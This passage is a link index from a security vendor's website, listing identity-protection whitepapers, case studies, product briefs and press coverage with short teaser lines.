Identity Security Threat Exposures: Are You Vulnerable?](https://www.silverfort.com/resources/todays-top-4-identity-security-threat-exposures-are-you-vulnerable/): When it comes to identity protection, we often focus on what’s visible above the surface – the user accounts and... - [Fortifying Identity Protection: The Silverfort Identity IR Playbook](https://www.silverfort.com/resources/the-silverfort-identity-ir-playbook/): An organization’s Incident Response Plan (IRP) is the set of processes followed by security teams to respond to an attack.... - [Securing Campus: Solving Identity Protection Gaps in Education Environments](https://www.silverfort.com/resources/solving-identity-protection-gaps-in-education-environments/): The education sector, including both K-12 and higher education, continues to be a high target for cyberattacks. Attack volume has... - [The Identity Threat Exposure Report](https://www.silverfort.com/resources/the-identity-threat-exposures-report/): Your defenses are sky high, but underground you’re exposed. When it comes to identity protection, the user accounts and configurations... - [Securing Service Accounts with Silverfort](https://www.silverfort.com/resources/securing-service-accounts-with-silverfort/): Watch this short video about Unified Identity Protection with Silverfort. - [Silverfort’s Deny Access Policies](https://www.silverfort.com/resources/silverforts-deny-access-policies/): Stop threats before they can start with deny access policies that actually work When it comes to identity threats, speed... - [Breaking Through MFA Barriers in Oil & Gas Air-Gapped Networks](https://www.silverfort.com/resources/breaking-through-mfa-barriers-in-oil-gas-air-gapped-networks/): Today’s interconnected world has made the cybersecurity landscape increasingly complex, particularly for industries such as oil and gas. Ransomware attacks... - [Building an Incident Response Playbook Against Scattered Spider in Real-Time](https://www.silverfort.com/resources/building-an-incident-response-playbook-against-scattered-spider-in-real-time/): In late 2023, the Scattered Spider threat group attacked the networks of several major financial and insurance entities, resulting in... - [How Silverfort Secures Former Employee Accounts](https://www.silverfort.com/resources/how-silverfort-secures-former-employee-accounts/): Many organizations spend a lot of time onboarding new employees and making sure they have access to everything they need;... - [Silverfort Identity Protection for NY-DFS 23 NYCRR Part 500](https://www.silverfort.com/resources/identity-protection-for-ny-dfs-part-500/): In this white paper, we explore how Silverfort enables organizations that are subject to NY-DFS cybersecurity regulation to fully meet... - [PCI DSS v4.0 Compliance with Silverfort Identity Protection](https://www.silverfort.com/resources/pci-dss-v4-compliance-with-silverfort-identity-protection/): Get PCI DSS v4. 0 ready—faster, smarter, and without the headache PCI DSS 3. 2. 1 is officially retired, and... - [Comply with Digital Operational Resilience Act (DORA) Requirements with Silverfort](https://www.silverfort.com/resources/comply-with-digital-operational-resilience-act-requirements-with-silverfort/): Make DORA compliance simple and secure with Silverfort - [Comply with CCOP Identity Protection Requirements with Silverfort](https://www.silverfort.com/resources/comply-with-ccop-identity-protection-requirements-with-silverfort/): In this solution brief, we explore how Silverfort enables operators of critical infrastructure in Singapore to align with the updated... - [Facing and Overcoming Retail Identity Protection Challenges](https://www.silverfort.com/resources/facing-and-overcoming-retail-identity-protection-challenges/): As retailers compete in an increasingly competitive marketplace, they invest a great deal of resources in becoming household names. But... - [Identity Attack Surface Key Weakness Analysis Redux: Shifting from On-Prem to Cloud](https://www.silverfort.com/resources/identity-attack-surface-key-weakness-analysis-redux-shifting-from-on-prem-to-cloud/): It’s no surprise that modern cyberattacks are looking for ways to move laterally both within an on-premises environment, as well... - [Identity Security in Healthcare: Challenges and Solutions](https://www.silverfort.com/resources/identity-protection-in-healthcare-challenges-and-solutions/): Identity threats are frequently targeted at healthcare organizations, resulting in serious injuries and disruptions to emergency services. Silverfort provides unified... - [Data#3 and Silverfort: Westminster School Case Study](https://www.silverfort.com/resources/westminster-school-with-data3/): Westminster School finds “missing piece” of security strategy with Data#3 and Silverfort Westminster School counts cyber security among the most... - [State of Emergency: Identity Security Blind Spots Endanger Healthcare Services](https://www.silverfort.com/resources/state-of-emergency-identity-security-blind-spots-endanger-healthcare-services/): Healthcare organizations are among the most targeted sectors for identity-related attacks as they utilize a wide range of systems and... - [Silverfort for PingOne DaVinci](https://www.silverfort.com/resources/silverfort-for-pingone-davinci/): Want to instantly act on identity threats—without writing a single line of code? This PDF introduces the powerful integration between... - [Frequently Asked Questions about Silverfort and Azure Marketplace](https://www.silverfort.com/resources/frequently-asked-questions-about-silverfort-and-azure-marketplace/): Purchasing Silverfort through the Azure Marketplace allows for a streamlined procurement process, allowing you to leverage your existing procurement relationship... - [Silverfort and ServiceNow Integration](https://www.silverfort.com/resources/silverfort-and-servicenow-integration/): What if your service accounts could protect themselves—without system changes or manual oversight? This PDF explains how Silverfort’s native integration... - [Securing Manufacturing Environments with Silverfort](https://www.silverfort.com/resources/securing-manufacturing-environments-with-mfa-2/): Manufacturers are more connected than ever, with a rapidly increasing number of manufacturing environments shifting from local user access to... - [Building an Incident Response Playbook on the Fly Against Scattered Spider Lateral Movement](https://www.silverfort.com/resources/building-an-incident-response-playbook-on-the-fly-against-scattered-spider-lateral-movement/): By now, you’ve likely heard about the largest – and possibly the most impactful – ransomware attack in recent memory... - [What is Silverfort's Cyber Insurance Assessment?](https://www.silverfort.com/resources/what-is-silverforts-cyber-insurance-assessment/): Struggling to meet identity-related cyber insurance requirements? Silverfort’s free assessment can help you bridge the gap—fast. This whitepaper introduces Silverfort’s... - [Cyber Essentials and Cyber Essentials Plus –Your Guide to Compliance Through Identity Protection](https://www.silverfort.com/resources/cyber-essentials-and-cyber-essentials-plus/): In this white paper, you will learn how organisations can integrate the Silverfort Unified Identity Protection platform to comply with... - [Overcoming the Security Blind Spots of Service Accounts](https://www.silverfort.com/resources/overcoming-the-security-blind-spots-of-service-accounts/): In today’s rapidly evolving cybersecurity landscape, service accounts have emerged as a pressing concern for identity and security stakeholders. With... - [Exploring The Critical Blind Spots of Privileged Access: Service Accounts & MFA in Active Directory](https://www.silverfort.com/resources/exploring-the-critical-blind-spots-of-privileged-access-service-accounts-mfa-in-active-directory/): Privileged access is at the top of the list in every organization’s cybersecurity discussions. With threat actors focusing on credentials... - [Securing networking devices with Silverfort's MFA protection](https://www.silverfort.com/resources/securing-networking-devices-with-silverfort/): Routers, switches, and firewalls are the backbone of your infrastructure—and the perfect target for attackers. So why leave them out... - [NEC XON and Silverfort: A Case Study](https://www.silverfort.com/resources/nec-xon-customer-case-study/): Gaining Full Visibility into Authentications and Lateral Movement Prevention NEC XON Systems is a leading African integrator of ICT solutions... - [Solving Identity Protection Gaps in Telecom Environments](https://www.silverfort.com/resources/solving-identity-protection-gaps-in-telecom-environments/): The telecom industry keeps the world connected. Whether it is private communications or business interactions, it is an integral component... - [How Silverfort Solves Telecom Identity Protection Challenges](https://www.silverfort.com/resources/how-silverfort-solves-telecom-identity-protection-challenges/): Keeping the world connected is the responsibility of the telecom industry. With the development of technology, the threat landscape of the... - [Silverfort and Microsoft Defender for Identity (MDI)](https://www.silverfort.com/resources/silverfort-and-microsoft-defender-for-identity/): Stop identity-based attacks in teal time—across all systems—with Silverfort and Microsoft Defender for Identity (MDI). - [Analysis of the Key Weaknesses and Exposures in the Identity Attack Surface | Silverfort](https://www.silverfort.com/resources/analysis-of-the-key-weaknesses-and-exposures-in-the-identity-attack-surface-silverfort/): If you’ve been paying attention to cyberattack actions, you already know that privileges are the key to an attacker’s success.... - [Silverfort and Yubico Integration](https://www.silverfort.com/resources/silverfort-and-yubico/): What if your YubiKeys could protect not just web apps—but every legacy system, database, and command-line tool too? With the... - [Silverfort and Kayak: A Case Study](https://www.silverfort.com/resources/silverfort-and-kayak-a-case-study/): In this testimonial, Kayak’s Tom Parker, VP of IT & CISO, and Austin Michaels, Security Engineer, explain how Silverfort enabled... - [Addressing the Telecommunication Security Framework Requirements for Privileged Accounts](https://www.silverfort.com/resources/addressing-telecommunication-security-framework-requirements-for-privileged-accounts/): This whitepaper specifies how organisations can use the Silverfort Unified Identity Protection platform to implement the identity protection aspect of... - [Silverfort and Huntsville Hospital: A Case Study](https://www.silverfort.com/resources/silverfort-and-huntsville-hospital-a-case-study-2/): In this testimonial, Huntsville Hospital’s Rick Corn, CIO and Ryan Petraszewsky, IT Security Officer discussed how Silverfort helped them to... - [Silverfort Bridging to Entra ID](https://www.silverfort.com/resources/silverfort-bridging-to-entra-id/): What if your legacy apps and on-prem tools could follow the same security policies as your cloud apps? That’s exactly... - [NHS England: MFA Policy Compliance with Silverfort](https://www.silverfort.com/resources/nhs-england-mfa-policy-compliance-with-silverfort/): NHS organisations and contractors are being encouraged to implement multi-factor authentication (MFA) controls for all privileged users and services accessing... - [Osterman Research + Silverfort: The State of the Identity Attack Surface](https://www.silverfort.com/resources/osterman-research-silverfort-the-state-of-the-identity-attack-surface/): Today, organizations depend on digital assets for business, but identity threats pose a critical risk. Attackers persistently target user identities,... - [Identity Zero-Trust: From Vision to Practical Implementation](https://www.silverfort.com/resources/identity-zero-trust-from-vision-to-practical-implementation/): Since its emergence, zero-trust has been commonly associated with rebuilding networking infrastructure security. Silverfort challenges this approach and enables organizations... - [Silverfort for Entra ID Sign-In Logs](https://www.silverfort.com/resources/silverfort-for-entra-id-sign-in-logs/): You already have the sign-in data. Silverfort helps you unlock its full security potential. This PDF details how Silverfort’s native... - [Way Too Vulnerable: Uncovering the State of the Identity Attack Surface | Silverfort](https://www.silverfort.com/resources/way-too-vulnerable-uncovering-the-state-of-the-identity-attack-surface-silverfort/): Organizations today rely on digital assets to conduct business, but identity threats have become a critical risk factor. As attackers... - [Silverfort's Unified Identity Protection](https://www.silverfort.com/resources/unified-identity-protection/): Watch this short video about Unified Identity Protection with Silverfort. - [The State of the Identity Attack Surface: An Osterman Research Report](https://www.silverfort.com/resources/the-state-of-the-identity-attack-surface-an-osterman-research-report/): The first comprehensive study on identity threats resilience: why organizations are unable to protect themselves against account takeovers, lateral movement,... - [Solving the MFA Challenge in Oil & Gas Air-Gapped Networks](https://www.silverfort.com/resources/solving-the-mfa-challenge-in-oil-gas-air-gapped-networks/): Oil and Gas companies struggle to maintain their air-gapped OT networks safe from identity threats such as lateral movement and... - [Silverfort MFA for Air-Gapped Networks](https://www.silverfort.com/resources/silverfort-mfa-for-air-gapped-networks/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... . - [Maribyrnong City Council and Silverfort: A Case Study](https://www.silverfort.com/resources/maribyrnong-city-council-and-silverfort-a-case-study/): Real-Time Visibility into All Access-Related Activity As a prominent governmental entity, the city council of Maribyrnong needed to increase its... - [Optix and Silverfort: A Case Study](https://www.silverfort.com/resources/optix-and-silverfort-a-case-study/): Renewed Cyber Insurance Policy and Prevented an Lateral Movement Attack Optix’s cyber insurance provider tightened their requirements for Optix to... - [Identity Zero Trust: How to Move from Vision to Implementation - eBook](https://www.silverfort.com/resources/identity-zero-trust-how-to-move-from-vision-to-implementation-ebook/): Learn why it makes sense to begin with an identity focus when it comes to Zero Trust and how Silverfort... - [Cyber Essentials and Cyber Essentials Plus Certification Assessment ](https://www.silverfort.com/resources/cyber-essentials-and-cyber-essentials-plus-certification-assessment/): This whitepaper specifies how organisations can integrate the Silverfort Unified Identity Protection platform to help comply with the Cyber Essentials and... - [Identity Threat Detection and Response (ITDR): Protecting the Exposed Attack Surface](https://www.silverfort.com/resources/identity-threat-detection-and-response-itdr-protecting-the-exposed-attack-surface/): Learn how Silverfort’s Azure AD bridging capability extends Azure AD MFA and Conditional Access to all on-prem resources while configuring... - [Solving the Top Five PAM Challenges of Identity Teams ](https://www.silverfort.com/resources/solving-the-top-five-pam-challenges-of-identity-teams/): Learn how Silverfort’s Azure AD bridging capability extends Azure AD MFA and Conditional Access to all on-prem resources while configuring... - [Bridging Legacy Resources From AD to Entra ID (Azure AD)](https://www.silverfort.com/resources/bridging-legacy-resources-from-ad-to-azure-ad-ebook/): Learn how Silverfort’s Azure AD bridging capability extends Azure AD MFA and Conditional Access to all on-prem resources while configuring... - [Real-Time MFA and Service Account Protection Can Defeat Ransomware Attacks](https://www.silverfort.com/resources/real-time-mfa-and-service-account-protection-can-defeat-ransomware-attacks/): Lateral movement is the X factor that transforms ransomware attacks from a mere nuisance to an enterprise-level incident. While once... - [Silverfort for Microsoft 365 E5](https://www.silverfort.com/resources/silverfort-for-microsoft-365-e5/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... . - [STARCO and Silverfort: A Case Study](https://www.silverfort.com/resources/starco-and-silverfort-a-case-study/): Extending MFA Protection to All Users and Resources Understanding the security risks of identity-based attack methods that are commonly used... - [Re-Evaluate Your MFA Protection - eBook](https://www.silverfort.com/resources/reevaluate-your-mfa-protection-ebook-ug/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... . - [Major Multinational Bank Extends Custom MFA to Legacy Applications](https://www.silverfort.com/resources/major-multinational-bank-extends-custom-mfa-to-legacy-applications/): Extending MFA Protection to Legacy Applications This case study examines an important issue faced by many financial institutions: How to... - [Discover and Protect Service Accounts](https://www.silverfort.com/resources/silverfort-service-accounts-solution-brief/): Silverfort automates the discovery, access control and protection of all service accounts in the environment, providing organizations with granular visibility... - [Securing Manufacturing Environments with MFA](https://www.silverfort.com/resources/securing-manufacturing-environments-with-mfa/): In this e-book you’ll learn the core components of lateral movement attacks and understand why they are a blind spot... - [Solving the Lateral Movement Protection Blind Spot with Identity Threat Detection and Response (ITDR)](https://www.silverfort.com/resources/solving-the-lateral-movement-protection-blind-spot-with-identity-threat-detection-and-response-itdr/): In this e-book you’ll learn the core components of lateral movement attacks and understand why they are a blind spot... - [Understanding Cyber Insurance Identity Security Requirements for 2023](https://www.silverfort.com/resources/understanding-cyber-insurance-identity-security-requirements-for-2023/): The practice of cyber insurance has gained momentum during the last decade and is now a common necessity for organizations... - [Silverfort & Microsoft: Extending Azure MFA to All Resources That Couldn’t Be Protected Before](https://www.silverfort.com/resources/silverfort-microsoft-extending-azure-mfa-to-all-resources-that-couldnt-be-protected-before/): Think Entra MFA stops at the cloud? Silverfort proves it doesn’t have to. This solution brief reveals how Silverfort supercharges... - [Silverfort & Microsoft AD FS Integration](https://www.silverfort.com/resources/silverfort-and-microsoft-ad-fs-integration/): Think AD FS can’t protect your legacy systems or on-prem servers with MFA? Think again. This PDF shows how Silverfort... - [Top Identity Protection Challenges for Manufacturing Organizations](https://www.silverfort.com/resources/top-identity-protection-challenges-for-manufacturing-organizations/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... . - [Silverfort MFA: Protect the Unprotectable](https://www.silverfort.com/resources/silverfort-mfa-protect-the-unprotectable/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... . - [Bounce the Ticket and Silver Iodide on Azure AD Kerberos](https://www.silverfort.com/resources/bounce-the-ticket-and-silver-iodide-on-azure-ad-kerberos/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... . - [Lateral Movement Prevention with MFA and Service Account Protection](https://www.silverfort.com/resources/lateral-movement-prevention-with-mfa-and-service-account-protection/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... . - [Accelerate Your Privileged Access Management (PAM) Journey](https://www.silverfort.com/resources/accelerate-your-privileged-access-management-pam-journey/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... . - [Extending Entra ID (formerly Azure AD), MFA, and Conditional Access to On-Prem Resources](https://www.silverfort.com/resources/silverfort-microsoft-azure-ad-extending-azure-mfa-to-unprotected-systems/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... . - [Extending Azure AD, MFA, and Conditional Access to On-Prem Resources](https://www.silverfort.com/resources/extending-azure-ad-mfa-and-conditional-access-to-on-prem-resources/): Silverfort’s agentless authentication platform integrates directly with Okta to extend strong, adaptive multi-factor authentication (MFA) everywhere... . - [Silverfort & Microsoft 365 Defender: Unified XDR & Identity Threat Protection](https://www.silverfort.com/resources/silverfort-microsoft-365-defender-unified-xdr-identity-threat-protection/): Today’s data breaches and ransomware attacks often include two key components – exploiting the endpoint and using compromised credentials to... - [Silverfort & Duo: Extending MFA to corporate resources that couldn’t be protected before](https://www.silverfort.com/resources/silverfort-duo-extending-mfa-to-corporate-resources-that-couldnt-be-protected-before/): This solution brief explores how Silverfort’s native integration with Duo extends MFA protection to previously unprotectable parts of your infrastructure,... - [Silverfort & RSA: Extending MFA to all resources](https://www.silverfort.com/resources/silverfort-rsa-extends-mfa-protection-to-all-resources-in-the-cloud-and-on-prem/): RSA SecurID is powerful—but what if it could also protect legacy apps, scripts, and servers that were never designed for... - [The Critical Role of Identity in Zero Trust Security](https://www.silverfort.com/resources/the-critical-role-of-identity-in-zero-trust-security/): The Zero Trust approach to cyber security was formulated to defend all users and applications from Internet and identity-based attacks.... - [Leading Manufacturer Averted Lateral Movement: A Case Study](https://www.silverfort.com/resources/leading-manufacturer-averted-lateral-movement/): Identity Protection: A Top Priority This case study discusses a supply chain cyber incident where a leading manufacturer was attacked... - [Analyze AD Traffic with the Lateral Movement Analyzer Tool (Beta)](https://www.silverfort.com/resources/lateral-movement-analyzer-tool-beta/): Domain Controllers are the nerve system of your enterprise. Silverfort's vulnerability assessment tool enables you to discover all DCs in... - [Agilisys and Silverfort: A Case Study](https://www.silverfort.com/resources/agilisys-and-silverfort-case-study/): Extending MFA Protection Across All Environments: Agilisys was looking to ensure sufficient MFA protection for all its environments and interfaces,... - [ZOL and Silverfort](https://www.silverfort.com/resources/zol-and-silverfort-a-case-study/): When ZOL hospital in Belgium needed to protect its service accounts from attack with minimal disruption, they turned to Silverfort. - [RWC and Silverfort: A Case Study](https://www.silverfort.com/resources/rwc-and-silverfort-a-case-study/): Reliance Worldwide Corporation is a publicly-traded leading manufacturer. Like many companies of its size, RWC cannot afford delays in production... - [Silverfort App for Splunk](https://www.silverfort.com/resources/silverfort-app-for-splunk/): The Silverfort App for Splunk brings advanced identity threat intelligence directly into your SOC’s existing workflows. This PDF breaks down... - [Best Practices for Service Accounts](https://www.silverfort.com/resources/whitepaper-service-accounts-best-practices/): Your service accounts are a security blind spot. Here’s how to fix that. - [The Essential Eight Maturity Model](https://www.silverfort.com/resources/the-essential-eight-maturity-model/): This whitepaper specifies how organisations can use the Silverfort Unified Identity Protection platform to implement the identity protection aspect of... - [Silverfort & SentinelOne: Identity Threat Protection](https://www.silverfort.com/resources/silverfort-sentinelone-identity-threat-protection/): What if your XDR platform could detect identity-based threats—and your identity tools could respond to endpoint attacks? With Silverfort and... - [Silverfort for Windows Login](https://www.silverfort.com/resources/silverfort-for-windows-login/): Protect every Windows login with adaptive MFA from Silverfort If attackers can log in, they can break in. So why... - [Help Your Clients Qualify for Cyber Insurance Coverage With Silverfort](https://www.silverfort.com/resources/help-your-clients-qualify-for-cyber-insurance-coverage-with-silverfort/): Silverfort enables clients to easily meet the new cyber insurance requirements for MFA protection across all sensitive systems, both on-prem... - [Implementing MFA for Cyber Insurance Made Easy with Silverfort](https://www.silverfort.com/resources/implementing-mfa-for-cyber-insurance-made-easy-with-silverfort/): The new requirement for MFA protection introduces a severe challenge to organizations of all sizes since standard MFA solutions cannot... - [Silverfort & HYPR: Extending Passwordless MFA To All Resources Within Your Environments](https://www.silverfort.com/resources/silverfort-hypr-extending-passwordless-mfa-to-all-resources-within-your-environments/): What if you could apply HYPR’s passwordless MFA to every app, server, and command-line tool—without touching a single one? The... - [IndoSat and Silverfort: A Case Study](https://www.silverfort.com/resources/indosat-and-silverfort-a-case-study/): IndoSat explains how Silverfort addresses their concerns about identity-based attacks by providing continuous visibility and real-time risk analysis across all... - [Privileged Accounts Protection Reborn with Silverfort](https://www.silverfort.com/resources/privileged-accounts-protection-reborn-with-silverfort/): Creating easily implemented MFA policies for all your privileged accounts is the only way to ensure they are not compromised.... - [Egan and Silverfort: A Case Study](https://www.silverfort.com/resources/egan-and-silverfort-a-case-study/): In this testimonial from Egan, they discuss how Silverfort enabled them to extend their coverage to assets that could not... - [Webinar-The Journey to Identity-Centric Zero Trust Architecture](https://www.silverfort.com/resources/webinar-the-journey-to-identity-centric-zero-trust-architecture/): More and more organizations acknowledge the implementation of Zero Trust in the identity control plane as the best protection against... - [How to Comply with the Cyber Insurance MFA Checklist](https://www.silverfort.com/resources/cyber-insurance-ebook/): Everyone knows the value of cyber insurance but keeping up with cyber insurance requirements can be tricky. As ransomware attacks... - [Silverfort MFA: Protect the Unprotectable – White Paper](https://www.silverfort.com/resources/silverfort-mfa-protect-the-unprotectable-white-paper/): The Silverfort MFA solution represents a fundamentally different approach to identity protection, providing MFA coverage to all enterprise resources –... - [MAS Risk Management Guidelines – Silverfort White Paper](https://www.silverfort.com/resources/mas-risk-management-guidelines-silverfort-white-paper/): The Monetary Authority of Singapore has revised its risk management guidelines to reduce the risk of identity-based attacks. Financial institutions... - [Re-Evaluate Your MFA Protection – eBook](https://www.silverfort.com/resources/re-evaluate-your-mfa-protection-ebook/): MFA protection is ultimately only as strong as its weakest link. Without an MFA deployment that covers all organizational resources,... - [eBook – The Dark Side of Ransomware Protection](https://www.silverfort.com/resources/rethinking-ransomware-protection/): Learn why ransomware propagation is often a blind spot for today’s security products, and how emerging Unified Identity Protection technology... - [Unified Risk Analysis Across Cloud and Hybrid Environments with Ping Identity](https://www.silverfort.com/resources/unified-risk-analysis-ping-id/): Silverfort’s Unified Risk Analysis across cloud and hybrid environments detects and prevents identity-based attacks with comprehensive risk analysis and adaptive... - [Multi-Factor Authentication: Not Just for Admins](https://www.silverfort.com/resources/mfa-not-just-for-admins/): Many believe that MFA is needed only for privileged accounts. This misconception can have far-reaching consequences, as recent events have... - [Discover Critical Identity Vulnerabilities with Silverfort’s Vulnerability Assessment Tool](https://www.silverfort.com/resources/discover-critical-identity-vulnerabilities/): Domain Controllers are the nerve system of your enterprise. Silverfort's vulnerability assessment tool enables you to discover all DCs in... - [Introducing Unified Identity Protection (German Subtitles)](https://www.silverfort.com/resources/introducing-unified-identity-protection-german/): Watch this short video about Unified Identity Protection, the first security solution that is purpose-built to secure modern enterprises against... - [Improving Cybersecurity with Unified Identity Protection](https://www.silverfort.com/resources/improving-cybersecurity-with-unified-identity-protection/): Following recent cybersecurity incidents such as SolarWinds, Microsoft Exchange, and the Colonial Pipeline incident, President Biden signed on May 21st,... - [Can You Block Lateral Movement In Real Time?](https://www.silverfort.com/resources/can-you-block-lateral-movement-in-real-time-3/): Watch the On Demand webinar to learn the difference between standard and advanced attacks, and why security solutions often fail... - [The Silverfort Identity Security Platform](https://www.silverfort.com/resources/silverfort-unified-identity-protection-overview/): The Silverfort Identity Security Platform closes critical identity security gaps that traditional solutions cannot address. By leveraging our patented Runtime... - [Why Service Accounts and Machine-to-Machine Access Should be Part of Any Zero Trust Initiative](https://www.silverfort.com/resources/thank-you-page-why-service-accounts-and-machine-to-machine-access-should-be-part-of-any-zero-trust-initiative/): With hundreds or even thousands of unsupervised, highly-privileged service accounts running in any modern organization, and given the difficulties of... - [Enabling Cloud Migration with Identity-Based Zero Trust](https://www.silverfort.com/resources/thank-you-page-enabling-cloud-migration-with-identity-based-zero-trust/): Zero Trust security goes beyond the traditional perimeter-based security model, and enables companies to migrate assets outside of their on-premise... - [Risk Analysis and Adaptive Policies in Zero Trust Security](https://www.silverfort.com/resources/risk-analysis-and-adaptive-policies-in-zero-trust-security/): In order to achieve effective Zero Trust security, you have to continuously analyze risk across all users, devices, systems and... - [Why Unified IAM Visibility & Control is Key for Zero Trust Security](https://www.silverfort.com/resources/thank-you-page-why-unified-iam-visibility-control-is-key-for-zero-trust/): Successful Zero Trust implementations focus heavily on telemetry and metrics derived from identities. - [Silverfort’s AI-Driven Risk Engine and Adaptive Authentication](https://www.silverfort.com/resources/silverfort-adaptive-authentication-white-paper/): This white paper reviews the benefits and challenges of adaptive authentication, read more... - [Four Simple Steps to Secure Your Service Accounts [30 minutes]](https://www.silverfort.com/resources/thank-you-page-four-simple-steps-to-secure-your-service-accounts-30-minutes-on-demand/): With hundreds or even thousands of unsupervised, highly-privileged service accounts running in modern organizations, they can become high-risk assets. - [Extending YubiKey FIDO2 Hardware Tokens to Any System and Interface with Silverfort](https://www.silverfort.com/resources/thank-you-page-form-extending-yubikey-fido2-hardware-tokens-to-any-system-and-interface-with-silverfort-2/): Now more than ever, organizations need a holistic authentication solution to maximize security without disrupting productivity. - [Partner Spotlight Series: Silverfort talks about meeting customer demands with YubiKey](https://www.silverfort.com/resources/partner-spotlight-series-silverfort-talks-about-meeting-customer-demands-with-the-yubikey/): Silverfort enables customers to seamlessly extend hardware-backed multi-factor authentication (MFA) with YubiKey across all systems ... - [Blocking Identity-Based Threats with Silverfort & Palo Alto Networks Cortex XSOAR](https://www.silverfort.com/resources/thank-you-page-form-blocking-identity-based-threats-with-silverfort-palo-alto-networks-cortex-xsoar-2/): Automate your security operations and response to identity-based threats and behavior anomalies with Silverfort playbooks. - [Securing Service Accounts Without Changing Passwords](https://www.silverfort.com/resources/securing-service-accounts-without-changing-passwords/): Service accounts are a prime target for hackers. However, securing the use of service accounts is a major challenge for... - [Silverfort & Okta: Multi-factor authentication for desktops and systems across the enterprise](https://www.silverfort.com/resources/okta-silverfort-multi-factor-authentication-for-desktops-and-systems-across-the-enterprise/): Silverfort’s integration with Okta extends your MFA coverage to the places it’s traditionally never reached—like legacy applications, command-line tools, file... - [Can You Detect and Block the Evasive Threat of Lateral Movement?](https://www.silverfort.com/resources/can-you-detect-and-block-the-evasive-threat-of-lateral-movement/): After penetrating the network, hackers use various lateral movement techniques to gain access to their target systems and data. In... - [Is Remote Access Putting Your Organization at Risk?](https://www.silverfort.com/resources/thank-you-page-form-is-remote-access-putting-your-organization-at-risk/): Recent events forced us to change the way we work and today most employees are working remotely. While enabling remote... - [Enabling Secure Remote Access Everywhere](https://www.silverfort.com/resources/secure-remote-access/): Silverfort enables frictionless secure authentication for any user, any device and any resource... - [Recorded Session: Enabling Secure Authentication and Zero-Trust](https://www.silverfort.com/resources/recorded-session-enabling-secure-authentication-and-zero-trust/): Dries Robberechts, Director of EMEA Sales explains how Silverfort enables secure authentication and Zero-Trust in in today’s perimeter-less networks - [Silverfort for IT and OT Networks](https://www.silverfort.com/resources/secure-authentication-across-it-and-ot-networks/): Silverfort applies an innovative architecture and a powerful AI-driven risk engine to monitor, analyze and secure all authentication ... . - [Silverfort platform Integration with Azure Active Directory](https://www.silverfort.com/resources/silverfort-platform-integration-with-azure-active-directory/): Silverfort integrates with Azure Active directly to influence conditional access policies in Azure AD in real-time and to deliver unified... - [Next Generation Authentication for Financial Services](https://www.silverfort.com/resources/next-generation-authentication-for-financial-services/): Cybersecurity is a top concern for banks, insurance companies, investment funds and other... - [Silverfort & Check Point Joint Solution Brief](https://www.silverfort.com/resources/threat-driven-multifactor-authentication-check-point-silverfort-solution-brief/): Learn how to prevent attacks without blocking legitimate users with dynamic MFA policies - [Protecting the Unprotectable](https://www.silverfort.com/resources/silverfort-product-overview/): Silverfort enables adaptive multi-factor authentication across entire corporate networks, industrial and cloud environments, from a... - [[Japanese] Introduction to Silverfort](https://www.silverfort.com/resources/japanese-introduction-to-silverfort/): このビデオでは、Hed Kovetz, CEO and Co-Founder, がSilverfortエージェントレス認証プラットフォームを日本市場に紹介します。 --- ## News and press - [Silverfort unveils AI Agent Security to protect agentic identities, securing MCP deployments with inline, dynamic security controls ](https://www.silverfort.com/press-news/silverfort-unveils-ai-agent-security/): Identity and access security layer gives enterprises the confidence to rapidly and securely adopt AI agents and accelerate innovation Boston,... - [Silverfort Appoints Howard Greenfield as President & Chief Revenue Officer as Demand for Identity Security Surges ](https://www.silverfort.com/press-news/silverfort-appoints-howard-greenfield-president-and-cro/): Former CRO of SailPoint and Centrify joins Silverfort to support the company's rapid growth and identity security market leadership - [10 Hot Cybersecurity Tools Announced At RSAC 2025](https://www.crn.com/news/security/2025/10-hot-cybersecurity-tools-announced-at-rsac-2025#new_tab) - [The recent ransomware attacks on UK retailers all targeted gaps in identity  ](https://www.scworld.com/perspective/time-for-retailers-to-treat-identity-as-a-core-strategy#new_tab) - [Silverfort expands its Non-Human Identity (NHI) Security offering to the cloud for end-to-end identity security](https://www.silverfort.com/press-news/silverfort-expands-its-non-human-identity-nhi-security-offering/): Only Silverfort secures all human and non-human identities across all environments in a single platform—from workforce identities to workload identities,... - [CyberSG TIG Collaboration Centre RSAC 2025 interview: Silverfort’s Hed Kovetz](https://www.scworld.com/resource/cybersg-tig-collaboration-centre-rsac-2025-interview#new_tab) - [5 ways corporate boards can support CISOs in 2025](https://www.scworld.com/perspective/5-ways-corporate-boards-can-support-cisos-in-2025#new_tab) - [Multiple Groups Exploit NTLM Flaw in Microsoft Windows](https://www.darkreading.com/cyberattacks-data-breaches/multiple-group-exploiting-ntlm-flaw#new_tab) - [CISOs are taking on ever more responsibilities and functional roles – has it gone too far?](https://www.csoonline.com/article/3851735/cisos-are-taking-on-ever-more-responsibilities-and-functional-roles-has-it-gone-too-far.html#new_tab) - [Podcast | Why Manufacturing Lags in Protecting Against Cyberattacks](https://www.supplychainbrain.com/articles/41389-podcast-why-manufacturing-lags-in-protecting-against-cyberattacks#new_tab) - [Silverfort Stakes Its Claim in the Identity Security Market with Patented Architecture and Rebrand, as Demand for Identity Security Accelerates ](https://www.silverfort.com/press-news/silverfort-stakes-its-claim-in-the-identity-security-market-with-patented-architecture-and-rebrand/): Introducing Runtime Access Protection (RAP) enabling the first end-to-end identity security platform, securing every identity across hybrid environments and disrupting... - [The Trust Stack For Enterprise AI: Building Trust And Easing Adoption](https://www.forbes.com/sites/alexanderpuutio/2025/01/22/the-trust-stack-for-enterprise-ai-building-trust-and-easing-adoption/) - [Ridding your network of NTLM](https://www.csoonline.com/article/2097636/ridding-your-network-of-ntlm.html#new_tab) - [Researchers Find Exploit Allowing NTLMv1 Despite Active Directory 